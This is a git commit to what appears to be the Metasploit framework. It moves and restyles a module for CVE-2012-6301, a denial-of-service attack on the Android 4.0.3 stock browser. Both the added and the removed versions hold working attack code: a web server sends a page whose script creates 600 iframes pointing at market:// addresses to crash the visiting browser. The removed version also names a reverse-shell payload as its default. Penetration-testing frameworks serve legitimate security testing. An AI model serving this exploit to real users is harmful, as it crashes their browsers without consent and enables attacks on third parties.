Merge pull request #2 from jhart-r7/pr/fixup-6237

Address style/usability concerns in Android CVE-2012-6301 module
2015-12-23 14:42:09 -05:00 · 2015-12-23 14:42:09 -05:00 · 6a52807673
parent fb14722ecb a8bb750db7
commit 6a52807673
2 changed files with 62 additions and 64 deletions
--- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb
+++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb
@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Android Stock Browser Iframe DOS",
+        'Description'    => %q(
+          This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
+          If successful, the browser will crash after viewing the webpage.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Jean Pascal Pereira',  # Original exploit discovery
+          'Jonathan Waggoner'     # Metasploit module
+        ],
+        'References'     => [
+          [ 'PACKETSTORM', '118539'],
+          [ 'CVE', '2012-6301' ]
+        ],
+        'DisclosureDate' => "Dec 1 2012",
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [[ 'WebServer' ]],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = %|
+    <html>
+    <body>
+    <script type="text/javascript">
+      for (var i = 0; i < 600; i++)
+      {
+        var m_frame = document.createElement("iframe");
+        m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");
+        document.body.appendChild(m_frame);
+      }
+    </script>
+    </body>
+    </html>
+    |
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Sending response')
+    send_response(cli, @html)
+  end
+end
--- a/modules/auxiliary/gather/android_stock_browser_iframe_dos.rb
+++ b/modules/auxiliary/gather/android_stock_browser_iframe_dos.rb
@ -1,64 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
-
-  include Msf::Exploit::Remote::HttpServer
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Android Stock Browser Iframe DOS",
-      'Description'    => %q{
-        This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
-        If successful, the browser will crash after viewing the webpage.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-        'Jean Pascal Pereira',  # Original exploit discovery
-        'Jonathan Waggoner'     # Metasploit module
-      ],
-      'References' => [
-        [ 'PACKETSTORM', '118539'],
-        [ 'CVE', '2012-6301' ]
-      ],
-      'Platform'            => 'android',
-      'Arch'                => ARCH_DALVIK,
-      'DefaultOptions'      => { 'PAYLOAD' => 'android/shell/reverse_http' },
-      'Targets'             => [ [ 'Automatic', {} ] ],
-      'DisclosureDate'      => "Dec 1 2012",
-      'DefaultTarget'       => 0
-      ))
-  end
-
-  def on_request_uri(cli, request)
-    html = %Q|
-    <html>
-    <body>
-    <script type="text/javascript">
-
-    var m_frame = "";
-
-    for(var i = 0; i < 600; i++)
-    {
-
-     m_frame = document.createElement("iframe");
-     m_frame.setAttribute("src", "market://a");
-
-     document.body.appendChild(m_frame);
-    }
-    </script>
-    </body>
-    </html>
-    |
-    print_status(msg = 'Getting ready to send HTML to client')
-    send_response(cli, html)
-    print_status(msg = 'Sent HTML to client')
-
-  end
-
-end